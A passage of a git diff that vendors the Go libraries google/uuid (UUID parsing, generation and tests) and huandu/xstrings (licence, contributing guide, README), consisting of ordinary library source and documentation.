UUID's variant. +type Variant byte + +// Constants returned by Variant. +const ( + Invalid = Variant(iota) // Invalid UUID + RFC4122 // The variant specified in RFC4122 + Reserved // Reserved, NCS backward compatibility. + Microsoft // Reserved, Microsoft Corporation backward compatibility. + Future // Reserved for future definition. +) + +var rander = rand.Reader // random function + +// Parse decodes s into a UUID or returns an error. Both the UUID form of +// xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx and +// urn:uuid:xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx are decoded. 
+func Parse(s string) (UUID, error) { + var uuid UUID + if len(s) != 36 { + if len(s) != 36+9 { + return uuid, fmt.Errorf("invalid UUID length: %d", len(s)) + } + if strings.ToLower(s[:9]) != "urn:uuid:" { + return uuid, fmt.Errorf("invalid urn prefix: %q", s[:9]) + } + s = s[9:] + } + if s[8] != '-' || s[13] != '-' || s[18] != '-' || s[23] != '-' { + return uuid, errors.New("invalid UUID format") + } + for i, x := range [16]int{ + 0, 2, 4, 6, + 9, 11, + 14, 16, + 19, 21, + 24, 26, 28, 30, 32, 34} { + if v, ok := xtob(s[x], s[x+1]); !ok { + return uuid, errors.New("invalid UUID format") + } else { + uuid[i] = v + } + } + return uuid, nil +} + +// ParseBytes is like Parse, except it parses a byte slice instead of a string. +func ParseBytes(b []byte) (UUID, error) { + var uuid UUID + if len(b) != 36 { + if len(b) != 36+9 { + return uuid, fmt.Errorf("invalid UUID length: %d", len(b)) + } + if !bytes.Equal(bytes.ToLower(b[:9]), []byte("urn:uuid:")) { + return uuid, fmt.Errorf("invalid urn prefix: %q", b[:9]) + } + b = b[9:] + } + if b[8] != '-' || b[13] != '-' || b[18] != '-' || b[23] != '-' { + return uuid, errors.New("invalid UUID format") + } + for i, x := range [16]int{ + 0, 2, 4, 6, + 9, 11, + 14, 16, + 19, 21, + 24, 26, 28, 30, 32, 34} { + if v, ok := xtob(b[x], b[x+1]); !ok { + return uuid, errors.New("invalid UUID format") + } else { + uuid[i] = v + } + } + return uuid, nil +} + +// Must returns uuid if err is nil and panics otherwise. +func Must(uuid UUID, err error) UUID { + if err != nil { + panic(err) + } + return uuid +} + +// String returns the string form of uuid, xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx +// , or "" if uuid is invalid. +func (uuid UUID) String() string { + var buf [36]byte + encodeHex(buf[:], uuid) + return string(buf[:]) +} + +// URN returns the RFC 2141 URN form of uuid, +// urn:uuid:xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx, or "" if uuid is invalid. 
+func (uuid UUID) URN() string {
+	var buf [36 + 9]byte
+	copy(buf[:], "urn:uuid:")
+	encodeHex(buf[9:], uuid)
+	return string(buf[:])
+}
+
+func encodeHex(dst []byte, uuid UUID) {
+	hex.Encode(dst[:], uuid[:4])
+	dst[8] = '-'
+	hex.Encode(dst[9:13], uuid[4:6])
+	dst[13] = '-'
+	hex.Encode(dst[14:18], uuid[6:8])
+	dst[18] = '-'
+	hex.Encode(dst[19:23], uuid[8:10])
+	dst[23] = '-'
+	hex.Encode(dst[24:], uuid[10:])
+}
+
+// Variant returns the variant encoded in uuid.
+func (uuid UUID) Variant() Variant {
+	switch {
+	case (uuid[8] & 0xc0) == 0x80:
+		return RFC4122
+	case (uuid[8] & 0xe0) == 0xc0:
+		return Microsoft
+	case (uuid[8] & 0xe0) == 0xe0:
+		return Future
+	default:
+		return Reserved
+	}
+}
+
+// Version returns the version of uuid.
+func (uuid UUID) Version() Version {
+	return Version(uuid[6] >> 4)
+}
+
+func (v Version) String() string {
+	if v > 15 {
+		return fmt.Sprintf("BAD_VERSION_%d", v)
+	}
+	return fmt.Sprintf("VERSION_%d", v)
+}
+
+func (v Variant) String() string {
+	switch v {
+	case RFC4122:
+		return "RFC4122"
+	case Reserved:
+		return "Reserved"
+	case Microsoft:
+		return "Microsoft"
+	case Future:
+		return "Future"
+	case Invalid:
+		return "Invalid"
+	}
+	return fmt.Sprintf("BadVariant%d", int(v))
+}
+
+// SetRand sets the random number generator to r, which implements io.Reader.
+// If r.Read returns an error when the package requests random data then
+// a panic will be issued.
+//
+// Calling SetRand with nil sets the random number generator to the default
+// generator.
+func SetRand(r io.Reader) {
+	if r == nil {
+		rander = rand.Reader
+		return
+	}
+	rander = r
+}
diff --git a/vendor/github.com/google/uuid/uuid_test.go b/vendor/github.com/google/uuid/uuid_test.go
new file mode 100644
index 0000000000..70986ff3f3
--- /dev/null
+++ b/vendor/github.com/google/uuid/uuid_test.go
@@ -0,0 +1,526 @@
+// Copyright 2016 Google Inc. All rights reserved.
+// Use of this source code is governed by a BSD-style +// license that can be found in the LICENSE file. + +package uuid + +import ( + "bytes" + "fmt" + "os" + "strings" + "testing" + "time" + "unsafe" +) + +type test struct { + in string + version Version + variant Variant + isuuid bool +} + +var tests = []test{ + {"f47ac10b-58cc-0372-8567-0e02b2c3d479", 0, RFC4122, true}, + {"f47ac10b-58cc-1372-8567-0e02b2c3d479", 1, RFC4122, true}, + {"f47ac10b-58cc-2372-8567-0e02b2c3d479", 2, RFC4122, true}, + {"f47ac10b-58cc-3372-8567-0e02b2c3d479", 3, RFC4122, true}, + {"f47ac10b-58cc-4372-8567-0e02b2c3d479", 4, RFC4122, true}, + {"f47ac10b-58cc-5372-8567-0e02b2c3d479", 5, RFC4122, true}, + {"f47ac10b-58cc-6372-8567-0e02b2c3d479", 6, RFC4122, true}, + {"f47ac10b-58cc-7372-8567-0e02b2c3d479", 7, RFC4122, true}, + {"f47ac10b-58cc-8372-8567-0e02b2c3d479", 8, RFC4122, true}, + {"f47ac10b-58cc-9372-8567-0e02b2c3d479", 9, RFC4122, true}, + {"f47ac10b-58cc-a372-8567-0e02b2c3d479", 10, RFC4122, true}, + {"f47ac10b-58cc-b372-8567-0e02b2c3d479", 11, RFC4122, true}, + {"f47ac10b-58cc-c372-8567-0e02b2c3d479", 12, RFC4122, true}, + {"f47ac10b-58cc-d372-8567-0e02b2c3d479", 13, RFC4122, true}, + {"f47ac10b-58cc-e372-8567-0e02b2c3d479", 14, RFC4122, true}, + {"f47ac10b-58cc-f372-8567-0e02b2c3d479", 15, RFC4122, true}, + + {"urn:uuid:f47ac10b-58cc-4372-0567-0e02b2c3d479", 4, Reserved, true}, + {"URN:UUID:f47ac10b-58cc-4372-0567-0e02b2c3d479", 4, Reserved, true}, + {"f47ac10b-58cc-4372-0567-0e02b2c3d479", 4, Reserved, true}, + {"f47ac10b-58cc-4372-1567-0e02b2c3d479", 4, Reserved, true}, + {"f47ac10b-58cc-4372-2567-0e02b2c3d479", 4, Reserved, true}, + {"f47ac10b-58cc-4372-3567-0e02b2c3d479", 4, Reserved, true}, + {"f47ac10b-58cc-4372-4567-0e02b2c3d479", 4, Reserved, true}, + {"f47ac10b-58cc-4372-5567-0e02b2c3d479", 4, Reserved, true}, + {"f47ac10b-58cc-4372-6567-0e02b2c3d479", 4, Reserved, true}, + {"f47ac10b-58cc-4372-7567-0e02b2c3d479", 4, Reserved, true}, + 
{"f47ac10b-58cc-4372-8567-0e02b2c3d479", 4, RFC4122, true}, + {"f47ac10b-58cc-4372-9567-0e02b2c3d479", 4, RFC4122, true}, + {"f47ac10b-58cc-4372-a567-0e02b2c3d479", 4, RFC4122, true}, + {"f47ac10b-58cc-4372-b567-0e02b2c3d479", 4, RFC4122, true}, + {"f47ac10b-58cc-4372-c567-0e02b2c3d479", 4, Microsoft, true}, + {"f47ac10b-58cc-4372-d567-0e02b2c3d479", 4, Microsoft, true}, + {"f47ac10b-58cc-4372-e567-0e02b2c3d479", 4, Future, true}, + {"f47ac10b-58cc-4372-f567-0e02b2c3d479", 4, Future, true}, + + {"f47ac10b158cc-5372-a567-0e02b2c3d479", 0, Invalid, false}, + {"f47ac10b-58cc25372-a567-0e02b2c3d479", 0, Invalid, false}, + {"f47ac10b-58cc-53723a567-0e02b2c3d479", 0, Invalid, false}, + {"f47ac10b-58cc-5372-a56740e02b2c3d479", 0, Invalid, false}, + {"f47ac10b-58cc-5372-a567-0e02-2c3d479", 0, Invalid, false}, + {"g47ac10b-58cc-4372-a567-0e02b2c3d479", 0, Invalid, false}, +} + +var constants = []struct { + c interface{} + name string +}{ + {Person, "Person"}, + {Group, "Group"}, + {Org, "Org"}, + {Invalid, "Invalid"}, + {RFC4122, "RFC4122"}, + {Reserved, "Reserved"}, + {Microsoft, "Microsoft"}, + {Future, "Future"}, + {Domain(17), "Domain17"}, + {Variant(42), "BadVariant42"}, +} + +func testTest(t *testing.T, in string, tt test) { + uuid, err := Parse(in) + if ok := (err == nil); ok != tt.isuuid { + t.Errorf("Parse(%s) got %v expected %v\b", in, ok, tt.isuuid) + } + if err != nil { + return + } + + if v := uuid.Variant(); v != tt.variant { + t.Errorf("Variant(%s) got %d expected %d\b", in, v, tt.variant) + } + if v := uuid.Version(); v != tt.version { + t.Errorf("Version(%s) got %d expected %d\b", in, v, tt.version) + } +} + +func testBytes(t *testing.T, in []byte, tt test) { + uuid, err := ParseBytes(in) + if ok := (err == nil); ok != tt.isuuid { + t.Errorf("ParseBytes(%s) got %v expected %v\b", in, ok, tt.isuuid) + } + if err != nil { + return + } + suuid, _ := Parse(string(in)) + if uuid != suuid { + t.Errorf("ParseBytes(%s) got %v expected %v\b", in, uuid, suuid) + } +} 
+ +func TestUUID(t *testing.T) { + for _, tt := range tests { + testTest(t, tt.in, tt) + testTest(t, strings.ToUpper(tt.in), tt) + testBytes(t, []byte(tt.in), tt) + } +} + +func TestConstants(t *testing.T) { + for x, tt := range constants { + v, ok := tt.c.(fmt.Stringer) + if !ok { + t.Errorf("%x: %v: not a stringer", x, v) + } else if s := v.String(); s != tt.name { + v, _ := tt.c.(int) + t.Errorf("%x: Constant %T:%d gives %q, expected %q", x, tt.c, v, s, tt.name) + } + } +} + +func TestRandomUUID(t *testing.T) { + m := make(map[string]bool) + for x := 1; x < 32; x++ { + uuid := New() + s := uuid.String() + if m[s] { + t.Errorf("NewRandom returned duplicated UUID %s", s) + } + m[s] = true + if v := uuid.Version(); v != 4 { + t.Errorf("Random UUID of version %s", v) + } + if uuid.Variant() != RFC4122 { + t.Errorf("Random UUID is variant %d", uuid.Variant()) + } + } +} + +func TestNew(t *testing.T) { + m := make(map[UUID]bool) + for x := 1; x < 32; x++ { + s := New() + if m[s] { + t.Errorf("New returned duplicated UUID %s", s) + } + m[s] = true + uuid, err := Parse(s.String()) + if err != nil { + t.Errorf("New.String() returned %q which does not decode", s) + continue + } + if v := uuid.Version(); v != 4 { + t.Errorf("Random UUID of version %s", v) + } + if uuid.Variant() != RFC4122 { + t.Errorf("Random UUID is variant %d", uuid.Variant()) + } + } +} + +func TestClockSeq(t *testing.T) { + // Fake time.Now for this test to return a monotonically advancing time; restore it at end. 
+ defer func(orig func() time.Time) { timeNow = orig }(timeNow) + monTime := time.Now() + timeNow = func() time.Time { + monTime = monTime.Add(1 * time.Second) + return monTime + } + + SetClockSequence(-1) + uuid1, err := NewUUID() + if err != nil { + t.Fatalf("could not create UUID: %v", err) + } + uuid2, err := NewUUID() + if err != nil { + t.Fatalf("could not create UUID: %v", err) + } + + if s1, s2 := uuid1.ClockSequence(), uuid2.ClockSequence(); s1 != s2 { + t.Errorf("clock sequence %d != %d", s1, s2) + } + + SetClockSequence(-1) + uuid2, err = NewUUID() + if err != nil { + t.Fatalf("could not create UUID: %v", err) + } + + // Just on the very off chance we generated the same sequence + // two times we try again. + if uuid1.ClockSequence() == uuid2.ClockSequence() { + SetClockSequence(-1) + uuid2, err = NewUUID() + if err != nil { + t.Fatalf("could not create UUID: %v", err) + } + } + if s1, s2 := uuid1.ClockSequence(), uuid2.ClockSequence(); s1 == s2 { + t.Errorf("Duplicate clock sequence %d", s1) + } + + SetClockSequence(0x1234) + uuid1, err = NewUUID() + if err != nil { + t.Fatalf("could not create UUID: %v", err) + } + if seq := uuid1.ClockSequence(); seq != 0x1234 { + t.Errorf("%s: expected seq 0x1234 got 0x%04x", uuid1, seq) + } +} + +func TestCoding(t *testing.T) { + text := "7d444840-9dc0-11d1-b245-5ffdce74fad2" + urn := "urn:uuid:7d444840-9dc0-11d1-b245-5ffdce74fad2" + data := UUID{ + 0x7d, 0x44, 0x48, 0x40, + 0x9d, 0xc0, + 0x11, 0xd1, + 0xb2, 0x45, + 0x5f, 0xfd, 0xce, 0x74, 0xfa, 0xd2, + } + if v := data.String(); v != text { + t.Errorf("%x: encoded to %s, expected %s", data, v, text) + } + if v := data.URN(); v != urn { + t.Errorf("%x: urn is %s, expected %s", data, v, urn) + } + + uuid, err := Parse(text) + if err != nil { + t.Errorf("Parse returned unexpected error %v", err) + } + if data != data { + t.Errorf("%s: decoded to %s, expected %s", text, uuid, data) + } +} + +func TestVersion1(t *testing.T) { + uuid1, err := NewUUID() + if err != nil { 
+ t.Fatalf("could not create UUID: %v", err) + } + uuid2, err := NewUUID() + if err != nil { + t.Fatalf("could not create UUID: %v", err) + } + + if uuid1 == uuid2 { + t.Errorf("%s:duplicate uuid", uuid1) + } + if v := uuid1.Version(); v != 1 { + t.Errorf("%s: version %s expected 1", uuid1, v) + } + if v := uuid2.Version(); v != 1 { + t.Errorf("%s: version %s expected 1", uuid2, v) + } + n1 := uuid1.NodeID() + n2 := uuid2.NodeID() + if !bytes.Equal(n1, n2) { + t.Errorf("Different nodes %x != %x", n1, n2) + } + t1 := uuid1.Time() + t2 := uuid2.Time() + q1 := uuid1.ClockSequence() + q2 := uuid2.ClockSequence() + + switch { + case t1 == t2 && q1 == q2: + t.Error("time stopped") + case t1 > t2 && q1 == q2: + t.Error("time reversed") + case t1 < t2 && q1 != q2: + t.Error("clock sequence chaned unexpectedly") + } +} + +func TestNode(t *testing.T) { + // This test is mostly to make sure we don't leave nodeMu locked. + ifname = "" + if ni := NodeInterface(); ni != "" { + t.Errorf("NodeInterface got %q, want %q", ni, "") + } + if SetNodeInterface("xyzzy") { + t.Error("SetNodeInterface succeeded on a bad interface name") + } + if !SetNodeInterface("") { + t.Error("SetNodeInterface failed") + } + if ni := NodeInterface(); ni == "" { + t.Error("NodeInterface returned an empty string") + } + + ni := NodeID() + if len(ni) != 6 { + t.Errorf("ni got %d bytes, want 6", len(ni)) + } + hasData := false + for _, b := range ni { + if b != 0 { + hasData = true + } + } + if !hasData { + t.Error("nodeid is all zeros") + } + + id := []byte{1, 2, 3, 4, 5, 6, 7, 8} + SetNodeID(id) + ni = NodeID() + if !bytes.Equal(ni, id[:6]) { + t.Errorf("got nodeid %v, want %v", ni, id[:6]) + } + + if ni := NodeInterface(); ni != "user" { + t.Errorf("got inteface %q, want %q", ni, "user") + } +} + +func TestNodeAndTime(t *testing.T) { + // Time is February 5, 1998 12:30:23.136364800 AM GMT + + uuid, err := Parse("7d444840-9dc0-11d1-b245-5ffdce74fad2") + if err != nil { + t.Fatalf("Parser returned 
unexpected error %v", err) + } + node := []byte{0x5f, 0xfd, 0xce, 0x74, 0xfa, 0xd2} + + ts := uuid.Time() + c := time.Unix(ts.UnixTime()) + want := time.Date(1998, 2, 5, 0, 30, 23, 136364800, time.UTC) + if !c.Equal(want) { + t.Errorf("Got time %v, want %v", c, want) + } + if !bytes.Equal(node, uuid.NodeID()) { + t.Errorf("Expected node %v got %v", node, uuid.NodeID()) + } +} + +func TestMD5(t *testing.T) { + uuid := NewMD5(NameSpaceDNS, []byte("python.org")).String() + want := "6fa459ea-ee8a-3ca4-894e-db77e160355e" + if uuid != want { + t.Errorf("MD5: got %q expected %q", uuid, want) + } +} + +func TestSHA1(t *testing.T) { + uuid := NewSHA1(NameSpaceDNS, []byte("python.org")).String() + want := "886313e1-3b8a-5372-9b90-0c9aee199e5d" + if uuid != want { + t.Errorf("SHA1: got %q expected %q", uuid, want) + } +} + +func TestNodeID(t *testing.T) { + nid := []byte{1, 2, 3, 4, 5, 6} + SetNodeInterface("") + s := NodeInterface() + if s == "" || s == "user" { + t.Errorf("NodeInterface %q after SetInteface", s) + } + node1 := NodeID() + if node1 == nil { + t.Error("NodeID nil after SetNodeInterface", s) + } + SetNodeID(nid) + s = NodeInterface() + if s != "user" { + t.Errorf("Expected NodeInterface %q got %q", "user", s) + } + node2 := NodeID() + if node2 == nil { + t.Error("NodeID nil after SetNodeID", s) + } + if bytes.Equal(node1, node2) { + t.Error("NodeID not changed after SetNodeID", s) + } else if !bytes.Equal(nid, node2) { + t.Errorf("NodeID is %x, expected %x", node2, nid) + } +} + +func testDCE(t *testing.T, name string, uuid UUID, err error, domain Domain, id uint32) { + if err != nil { + t.Errorf("%s failed: %v", name, err) + return + } + if v := uuid.Version(); v != 2 { + t.Errorf("%s: %s: expected version 2, got %s", name, uuid, v) + return + } + if v := uuid.Domain(); v != domain { + t.Errorf("%s: %s: expected domain %d, got %d", name, uuid, domain, v) + } + if v := uuid.ID(); v != id { + t.Errorf("%s: %s: expected id %d, got %d", name, uuid, id, v) + } +} + 
+func TestDCE(t *testing.T) { + uuid, err := NewDCESecurity(42, 12345678) + testDCE(t, "NewDCESecurity", uuid, err, 42, 12345678) + uuid, err = NewDCEPerson() + testDCE(t, "NewDCEPerson", uuid, err, Person, uint32(os.Getuid())) + uuid, err = NewDCEGroup() + testDCE(t, "NewDCEGroup", uuid, err, Group, uint32(os.Getgid())) +} + +type badRand struct{} + +func (r badRand) Read(buf []byte) (int, error) { + for i, _ := range buf { + buf[i] = byte(i) + } + return len(buf), nil +} + +func TestBadRand(t *testing.T) { + SetRand(badRand{}) + uuid1 := New() + uuid2 := New() + if uuid1 != uuid2 { + t.Errorf("execpted duplicates, got %q and %q", uuid1, uuid2) + } + SetRand(nil) + uuid1 = New() + uuid2 = New() + if uuid1 == uuid2 { + t.Errorf("unexecpted duplicates, got %q", uuid1) + } +} + +var asString = "f47ac10b-58cc-0372-8567-0e02b2c3d479" +var asBytes = []byte(asString) + +func BenchmarkParse(b *testing.B) { + for i := 0; i < b.N; i++ { + _, err := Parse(asString) + if err != nil { + b.Fatal(err) + } + } +} + +func BenchmarkParseBytes(b *testing.B) { + for i := 0; i < b.N; i++ { + _, err := ParseBytes(asBytes) + if err != nil { + b.Fatal(err) + } + } +} + +// parseBytesUnsafe is to benchmark using unsafe. +func parseBytesUnsafe(b []byte) (UUID, error) { + return Parse(*(*string)(unsafe.Pointer(&b))) +} + + +func BenchmarkParseBytesUnsafe(b *testing.B) { + for i := 0; i < b.N; i++ { + _, err := parseBytesUnsafe(asBytes) + if err != nil { + b.Fatal(err) + } + } +} + +// parseBytesCopy is to benchmark not using unsafe. 
+func parseBytesCopy(b []byte) (UUID, error) { + return Parse(string(b)) +} + +func BenchmarkParseBytesCopy(b *testing.B) { + for i := 0; i < b.N; i++ { + _, err := parseBytesCopy(asBytes) + if err != nil { + b.Fatal(err) + } + } +} + +func BenchmarkNew(b *testing.B) { + for i := 0; i < b.N; i++ { + New() + } +} + +func BenchmarkUUID_String(b *testing.B) { + uuid, err := Parse("f47ac10b-58cc-0372-8567-0e02b2c3d479") + if err != nil { + b.Fatal(err) + } + for i := 0; i < b.N; i++ { + if uuid.String() == "" { + b.Fatal("invalid uuid") + } + } +} + +func BenchmarkUUID_URN(b *testing.B) { + uuid, err := Parse("f47ac10b-58cc-0372-8567-0e02b2c3d479") + if err != nil { + b.Fatal(err) + } + for i := 0; i < b.N; i++ { + if uuid.URN() == "" { + b.Fatal("invalid uuid") + } + } +} diff --git a/vendor/github.com/google/uuid/version1.go b/vendor/github.com/google/uuid/version1.go new file mode 100644 index 0000000000..22dc07cdce --- /dev/null +++ b/vendor/github.com/google/uuid/version1.go @@ -0,0 +1,44 @@ +// Copyright 2016 Google Inc. All rights reserved. +// Use of this source code is governed by a BSD-style +// license that can be found in the LICENSE file. + +package uuid + +import ( + "encoding/binary" +) + +// NewUUID returns a Version 1 UUID based on the current NodeID and clock +// sequence, and the current time. If the NodeID has not been set by SetNodeID +// or SetNodeInterface then it will be set automatically. If the NodeID cannot +// be set NewUUID returns nil. If clock sequence has not been set by +// SetClockSequence then it will be set automatically. If GetTime fails to +// return the current NewUUID returns Nil and an error. +// +// In most cases, New should be used. 
+func NewUUID() (UUID, error) { + nodeMu.Lock() + if nodeID == zeroID { + setNodeInterface("") + } + nodeMu.Unlock() + + var uuid UUID + now, seq, err := GetTime() + if err != nil { + return uuid, err + } + + timeLow := uint32(now & 0xffffffff) + timeMid := uint16((now >> 32) & 0xffff) + timeHi := uint16((now >> 48) & 0x0fff) + timeHi |= 0x1000 // Version 1 + + binary.BigEndian.PutUint32(uuid[0:], timeLow) + binary.BigEndian.PutUint16(uuid[4:], timeMid) + binary.BigEndian.PutUint16(uuid[6:], timeHi) + binary.BigEndian.PutUint16(uuid[8:], seq) + copy(uuid[10:], nodeID[:]) + + return uuid, nil +} diff --git a/vendor/github.com/google/uuid/version4.go b/vendor/github.com/google/uuid/version4.go new file mode 100644 index 0000000000..390dd2cad4 --- /dev/null +++ b/vendor/github.com/google/uuid/version4.go @@ -0,0 +1,38 @@ +// Copyright 2016 Google Inc. All rights reserved. +// Use of this source code is governed by a BSD-style +// license that can be found in the LICENSE file. + +package uuid + +import "io" + +// New is creates a new random UUID or panics. New is equivalent to +// the expression +// +// uuid.Must(uuid.NewRandom()) +func New() UUID { + return Must(NewRandom()) +} + +// NewRandom returns a Random (Version 4) UUID or panics. +// +// The strength of the UUIDs is based on the strength of the crypto/rand +// package. +// +// A note about uniqueness derived from from the UUID Wikipedia entry: +// +// Randomly generated UUIDs have 122 random bits. One's annual risk of being +// hit by a meteorite is estimated to be one chance in 17 billion, that +// means the probability is about 0.00000000006 (6 × 10−11), +// equivalent to the odds of creating a few tens of trillions of UUIDs in a +// year and having one duplicate. 
+func NewRandom() (UUID, error) { + var uuid UUID + _, err := io.ReadFull(rander, uuid[:]) + if err != nil { + return Nil, err + } + uuid[6] = (uuid[6] & 0x0f) | 0x40 // Version 4 + uuid[8] = (uuid[8] & 0x3f) | 0x80 // Variant is 10 + return uuid, nil +} diff --git a/vendor/github.com/huandu/xstrings/.gitignore b/vendor/github.com/huandu/xstrings/.gitignore new file mode 100644 index 0000000000..daf913b1b3 --- /dev/null +++ b/vendor/github.com/huandu/xstrings/.gitignore @@ -0,0 +1,24 @@ +# Compiled Object files, Static and Dynamic libs (Shared Objects) +*.o +*.a +*.so + +# Folders +_obj +_test + +# Architecture specific extensions/prefixes +*.[568vq] +[568vq].out + +*.cgo1.go +*.cgo2.c +_cgo_defun.c +_cgo_gotypes.go +_cgo_export.* + +_testmain.go + +*.exe +*.test +*.prof diff --git a/vendor/github.com/huandu/xstrings/.travis.yml b/vendor/github.com/huandu/xstrings/.travis.yml new file mode 100644 index 0000000000..4f2ee4d973 --- /dev/null +++ b/vendor/github.com/huandu/xstrings/.travis.yml @@ -0,0 +1 @@ +language: go diff --git a/vendor/github.com/huandu/xstrings/CONTRIBUTING.md b/vendor/github.com/huandu/xstrings/CONTRIBUTING.md new file mode 100644 index 0000000000..d7b4b8d584 --- /dev/null +++ b/vendor/github.com/huandu/xstrings/CONTRIBUTING.md @@ -0,0 +1,23 @@ +# Contributing # + +Thanks for your contribution in advance. No matter what you will contribute to this project, pull request or bug report or feature discussion, it's always highly appreciated. + +## New API or feature ## + +I want to speak more about how to add new functions to this package. + +Package `xstring` is a collection of useful string functions which should be implemented in Go. It's a bit subject to say which function should be included and which should not. I set up following rules in order to make it clear and as objective as possible. + +* Rule 1: Only string algorithm, which takes string as input, can be included. 
+* Rule 2: If a function has been implemented in package `string`, it must not be included. +* Rule 3: If a function is not language neutral, it must not be included. +* Rule 4: If a function is a part of standard library in other languages, it can be included. +* Rule 5: If a function is quite useful in some famous framework or library, it can be included. + +New function must be discussed in project issues before submitting any code. If a pull request with new functions is sent without any ref issue, it will be rejected. + +## Pull request ## + +Pull request is always welcome. Just make sure you have run `go fmt` and all test cases passed before submit. + +If the pull request is to add a new API or feature, don't forget to update README.md and add new API in function list. diff --git a/vendor/github.com/huandu/xstrings/LICENSE b/vendor/github.com/huandu/xstrings/LICENSE new file mode 100644 index 0000000000..2701772593 --- /dev/null +++ b/vendor/github.com/huandu/xstrings/LICENSE @@ -0,0 +1,22 @@ +The MIT License (MIT) + +Copyright (c) 2015 Huan Du + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. + diff --git a/vendor/github.com/huandu/xstrings/README.md b/vendor/github.com/huandu/xstrings/README.md new file mode 100644 index 0000000000..c824a5c3f2 --- /dev/null +++ b/vendor/github.com/huandu/xstrings/README.md @@ -0,0 +1,114 @@ +# xstrings # + +[![Build Status](https://travis-ci.org/huandu/xstrings.svg?branch=master)](https://travis-ci.org/huandu/xstrings) +[![GoDoc](https://godoc.org/github.com/huandu/xstrings?status.svg)](https://godoc.org/github.com/huandu/xstrings) + +Go package [xstrings](https://godoc.org/github.com/huandu/xstrings) is a collection of string functions, which are widely used in other languages but absent in Go package [strings](http://golang.org/pkg/strings). + +All functions are well tested and carefully tuned for performance. + +## Propose a new function ## + +Please review [contributing guideline](CONTRIBUTING.md) and [create new issue](https://github.com/huandu/xstrings/issues) to state why it should be included. + +## Install ## + +Use `go get` to install this library. + + go get github.com/huandu/xstrings + +## API document ## + +See [GoDoc](https://godoc.org/github.com/huandu/xstrings) for full document. + +## Function list ## + +Go functions have a unique naming style. One, who has experience in other language but new in Go, may have difficulties to find out right string function to use. + +Here is a list of functions in [strings](http://golang.org/pkg/strings) and [xstrings](https://godoc.org/github.com/huandu/xstrings) with enough extra information about how to map these functions to their friends in other languages. Hope this list could be helpful for fresh gophers. 
+ +### Package `xstrings` functions ### + +*Keep this table sorted by Function in ascending order.* + +| Function | Friends | # | +| -------- | ------- | --- | +| [Center](https://godoc.org/github.com/huandu/xstrings#Center) | `str.center` in Python; `String#center` in Ruby | [#30](https://github.com/huandu/xstrings/issues/30) | +| [Count](https://godoc.org/github.com/huandu/xstrings#Count) | `String#count` in Ruby | [#16](https://github.com/huandu/xstrings/issues/16) | +| [Delete](https://godoc.org/github.com/huandu/xstrings#Delete) | `String#delete` in Ruby | [#17](https://github.com/huandu/xstrings/issues/17) | +| [ExpandTabs](https://godoc.org/github.com/huandu/xstrings#ExpandTabs) | `str.expandtabs` in Python | [#27](https://github.com/huandu/xstrings/issues/27) | +| [FirstRuneToLower](https://godoc.org/github.com/huandu/xstrings#FirstRuneToLower) | `lcfirst` in PHP or Perl | [#15](https://github.com/huandu/xstrings/issues/15) | +| [FirstRuneToUpper](https://godoc.org/github.com/huandu/xstrings#FirstRuneToUpper) | `String#capitalize` in Ruby; `ucfirst` in PHP or Perl | [#15](https://github.com/huandu/xstrings/issues/15) | +| [Insert](https://godoc.org/github.com/huandu/xstrings#Insert) | `String#insert` in Ruby | [#18](https://github.com/huandu/xstrings/issues/18) | +| [LastPartition](https://godoc.org/github.com/huandu/xstrings#LastPartition) | `str.rpartition` in Python; `String#rpartition` in Ruby | [#19](https://github.com/huandu/xstrings/issues/19) | +| [LeftJustify](https://godoc.org/github.com/huandu/xstrings#LeftJustify) | `str.ljust` in Python; `String#ljust` in Ruby | [#28](https://github.com/huandu/xstrings/issues/28) | +| [Len](https://godoc.org/github.com/huandu/xstrings#Len) | `mb_strlen` in PHP | [#23](https://github.com/huandu/xstrings/issues/23) | +| [Partition](https://godoc.org/github.com/huandu/xstrings#Partition) | `str.partition` in Python; `String#partition` in Ruby | [#10](https://github.com/huandu/xstrings/issues/10) | +| 
[Reverse](https://godoc.org/github.com/huandu/xstrings#Reverse) | `String#reverse` in Ruby; `strrev` in PHP; `reverse` in Perl | [#7](https://github.com/huandu/xstrings/issues/7) | +| [RightJustify](https://godoc.org/github.com/huandu/xstrings#RightJustify) | `str.rjust` in Python; `String#rjust` in Ruby | [#29](https://github.com/huandu/xstrings/issues/29) | +| [RuneWidth](https://godoc.org/github.com/huandu/xstrings#RuneWidth) | - | [#27](https://github.com/huandu/xstrings/issues/27) | +| [Scrub](https://godoc.org/github.com/huandu/xstrings#Scrub) | `String#scrub` in Ruby | [#20](https://github.com/huandu/xstrings/issues/20) | +| [Shuffle](https://godoc.org/github.com/huandu/xstrings#Shuffle) | `str_shuffle` in PHP | [#13](https://github.com/huandu/xstrings/issues/13) | +| [ShuffleSource](https://godoc.org/github.com/huandu/xstrings#ShuffleSource) | `str_shuffle` in PHP | [#13](https://github.com/huandu/xstrings/issues/13) | +| [Slice](https://godoc.org/github.com/huandu/xstrings#Slice) | `mb_substr` in PHP | [#9](https://github.com/huandu/xstrings/issues/9) | +| [Squeeze](https://godoc.org/github.com/huandu/xstrings#Squeeze) | `String#squeeze` in Ruby | [#11](https://github.com/huandu/xstrings/issues/11) | +| [Successor](https://godoc.org/github.com/huandu/xstrings#Successor) | `String#succ` or `String#next` in Ruby | [#22](https://github.com/huandu/xstrings/issues/22) | +| [SwapCase](https://godoc.org/github.com/huandu/xstrings#SwapCase) | `str.swapcase` in 